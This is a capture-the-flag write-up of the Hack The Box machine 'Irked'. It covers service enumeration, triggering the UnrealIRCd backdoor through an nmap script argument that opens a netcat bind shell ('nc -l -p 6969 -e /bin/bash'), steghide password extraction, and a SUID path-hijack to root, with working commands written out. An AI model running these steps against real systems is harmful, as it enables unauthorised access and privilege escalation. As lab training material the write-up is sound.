# IRKED | 10.10.10.117

## Initial Enumeration

    nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.117

### Open Ports and Their Services

* 22 - SSH - OpenSSH 6.7p1 Debian (8u4)
* 80 - HTTP - Apache 2.4.10 (Debian)
* 111 - RPCBIND
* 6697 - UnrealIRCd
* 8067 - UnrealIRCd
* 60538 - Status 1 (RPC)
* 65534 - UnrealIRCd

## Service Enumeration

### 22 - SSH

We will need valid credentials if we want to access the system using SSH.

### 80 - HTTP

The version of Apache does not appear to be vulnerable to any known exploits. The main page gives us a hint to what we may need to look for:

![](img/port-80.png)

### 111/60538 - RPCBIND

Trying to connect via rpcclient with a null session yields no results, so I'll move on.

### 6697/8067/65534 - UnrealIRCd

Clearly some kind of IRC program. And with the clue on port 80, I think this may be the service I need to exploit.

The nmap `irc-info.nse` script gave me the email address of the admin (djmardov@irked.htb)

Then I ran the `irc-unrealircd-backdoor` nmap script, and it returned that this may in fact be a version with a backdoor in it:

![](img/irc-trojan.png)

According to the documentation, it might be possible to make it run a netcat listener. I will try that if all else fails.

A searchsploit query gives me a perl script that I think I would have to modify a lot to do what I want. Actually I got a shell already so lets skip ahead the exploitation part!

## Exploitation

I was curious about whether or not I could actually use the nmap script to get a shell, and I am happy to say I succeeded. The following command activated the backdoor after waiting for 2 minutes, then executed a netcat listener command:

    nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.wait=120,irc-unrealircd-backdoor.command='nc -l -p 6969 -e /bin/bash' 10.10.10.117  

Then, I was able to connect to the machine with `nc -nv 10.10.10.117 6969`:

![](img/backdoor-shell.png)

The first time I've ever accessed a machine this way; usually it is via a reverse shell. Wow so exciting!

## User Enumeration

I am the ircd user, and I do not have read privs for the regular user's (who turns out to be djmardov) flag.

![](img/noread.png)

However, there is an interesting hidden file, hinting that I may have to use that password for decoding an image:

![](img/stegpw.png)

Which honestly is a bit meh since it seems very CTF-like, which I find tedious. But whatever.

As for my own user's bash history, there is definitely something there:

![](img/history.png)

I transferred over [pspy](https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0) to peek on running processes, but I found nothing of note.

Linpeas did not give me much, and Linux Exploit Suggester suggested using dirtycow, which I guess is what I'll do.

## Privilege Escalation

I tried a few different versions of the DirtyCow exploit, they all compiled correctly on the system, but none of them worked. 

So I went back to the drawing board and decided that I had to try that password I found in the '.backup' file. The only image I have come across is the one on the webpage, the stupid smiley face. So I downloaded that to my machine and set about trying to figure out how to decode any information in it.

I found out I needed to install a program called 'steghide' on my machine (older versions of Kali might already have it installed).

I typed out the command `steghide extract -sf irked.jpg` and it responded with a passphrase prompt, which was the passphrase I found in the user's home directory. The response was a text file with the user's password, and I was able to log in:

![](img/djmardov.png)

Just, so stupid. I don't see how that is at all an OSCP-like box, but fine. Let's continue.

### Flag

Nearly forgot to grab the flag because I was so annoyed with that lame privesc:

![](img/user-flag.png)

### User to root

So let's recall that this system does not have sudo installed, which is annoying AF.

I run a search for SUID binaries with `find / -type f -perm -04000 -ls 2>/dev/null` and there is one in the list that stands out:

![](img/viewuser.png)

It wants to run a non-existent file, so I could just copy '/bin/bash' over to that location and name and I should have a root shell:

    cp /bin/bash /tmp/listusers
    /usr/bin/viewuser

And it worked, I am now root:

![](img/root-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

Gotta say I hated this one. I don't want to bother doing lame steg things in order to gain access; it's not very realistic at all. At least the privesc from user to root had something interesting in it, though it would have been better if it was a binary that was normally found on a system.

Steps taken:

* Nmap scan finds IRC ports open, and backdoor found
* Exploit backdoor through nmap script, gaining a bind shell
* Decode a password from an image (lame) and use it to switch users
* Escalate to root via an SUID binary
